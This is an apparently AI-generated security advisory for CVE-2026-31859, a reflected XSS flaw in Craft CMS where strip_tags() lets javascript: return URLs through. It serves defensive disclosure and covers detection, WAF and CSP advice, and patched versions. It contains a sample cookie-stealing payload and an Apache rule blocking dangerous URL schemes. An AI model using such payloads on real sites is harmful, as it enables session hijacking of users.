CVE-2026-31859 Overview
CVE-2026-31859 is a Cross-Site Scripting (XSS) vulnerability in Craft CMS, a popular content management system. The vulnerability exists due to an incomplete fix for CVE-2025-35939, where the strip_tags() function was introduced in src/web/User.php to sanitize return URLs before they are stored in the session. However, strip_tags() only removes HTML tags (angle brackets) and does not inspect or filter URL schemes. Malicious payloads using schemes like javascript: contain no HTML tags and pass through strip_tags() completely unmodified, enabling reflected XSS when the return URL is rendered in an href attribute.
Critical Impact
Attackers can execute arbitrary JavaScript in the context of authenticated user sessions, potentially stealing session cookies, performing actions on behalf of users, or redirecting users to malicious sites.
Affected Products
- Craft CMS versions prior to 5.9.7
- Craft CMS versions prior to 4.17.3
- craftcms/cms package (Composer)
Discovery Timeline
- 2026-03-11 - CVE-2026-31859 published to NVD
- 2026-03-12 - Last updated in NVD database
Technical Details for CVE-2026-31859
Vulnerability Analysis
This vulnerability represents a classic case of incomplete input validation leading to reflected XSS. The original fix for CVE-2025-35939 attempted to sanitize user-controlled return URLs by using PHP's strip_tags() function. While this approach effectively removes HTML tags enclosed in angle brackets, it fails to address dangerous URL schemes.
The strip_tags() function is designed to remove HTML and PHP tags from a string, but URL schemes like javascript:, vbscript:, or data: do not contain angle brackets and are therefore not filtered. When the unsanitized return URL is later rendered in an href attribute within the application's HTML output, the malicious JavaScript payload executes in the victim's browser context.
This vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically as a reflected XSS attack vector. The attack requires user interaction—typically clicking a crafted link—but requires no authentication or special privileges from the attacker's perspective.
Root Cause
The root cause is the improper use of strip_tags() for URL sanitization in src/web/User.php. The function was implemented as a security measure but does not validate URL schemes. Proper mitigation requires either a URL scheme allowlist (permitting only http: and https:) or explicit blocking of dangerous schemes like javascript:, vbscript:, and data:.
Attack Vector
The attack is network-based and requires user interaction. An attacker crafts a malicious URL containing a javascript: payload in the return URL parameter. When a victim clicks the link, the payload is stored in their session and later rendered in an href attribute. Upon interacting with the affected element, the JavaScript executes in the victim's browser with full access to the session context.
A typical attack payload would use a format like javascript:alert(document.cookie) or more sophisticated payloads designed to exfiltrate session tokens or perform authenticated actions. Since the payload contains no HTML tags, it bypasses the strip_tags() sanitization entirely and is stored unchanged in the session.
Detection Methods for CVE-2026-31859
Indicators of Compromise
- Unusual return URL parameters containing javascript:, vbscript:, or data: schemes in web server access logs
- Session data containing URL values with script-based schemes
- Reports of unexpected JavaScript execution or browser alerts from authenticated users
- Referrer URLs in logs pointing to external domains with encoded payloads
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect and block requests containing javascript: or similar dangerous URL schemes in parameter values
- Enable Content Security Policy (CSP) headers to mitigate XSS impact by restricting inline script execution
- Review web server logs for URL parameters containing suspicious scheme patterns using regex matching
- Deploy client-side XSS detection tools that monitor for unexpected script execution
Monitoring Recommendations
- Monitor application logs for return URL parameters containing non-HTTP schemes
- Set up alerts for CSP violation reports that may indicate attempted XSS exploitation
- Track user session anomalies that could suggest session hijacking following successful XSS attacks
- Implement real-time log analysis for patterns associated with XSS payloads
How to Mitigate CVE-2026-31859
Immediate Actions Required
- Upgrade Craft CMS to version 5.9.7 or later for the 5.x branch
- Upgrade Craft CMS to version 4.17.3 or later for the 4.x branch
- Review and update Composer dependencies using composer update craftcms/cms
- Implement Content Security Policy headers to limit XSS impact as a defense-in-depth measure
Patch Information
The vulnerability is fixed in Craft CMS versions 5.9.7 and 4.17.3. The patch implements proper URL scheme validation to ensure only safe schemes (http: and https:) are permitted in return URLs. Users should update immediately via Composer. For detailed patch information, refer to the GitHub Security Advisory.
Workarounds
- Implement a reverse proxy or WAF rule to strip or block requests containing javascript:, vbscript:, or data: schemes in URL parameters
- Deploy Content Security Policy headers with script-src 'self' to prevent inline JavaScript execution
- Temporarily disable functionality that relies on user-controlled return URLs if upgrading is not immediately possible
- Monitor and filter session data for malicious URL schemes at the application layer
# Example: Apache mod_rewrite rule to block javascript: URLs
RewriteEngine On
RewriteCond %{QUERY_STRING} javascript: [NC,OR]
RewriteCond %{QUERY_STRING} vbscript: [NC,OR]
RewriteCond %{QUERY_STRING} data: [NC]
RewriteRule .* - [F,L]
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
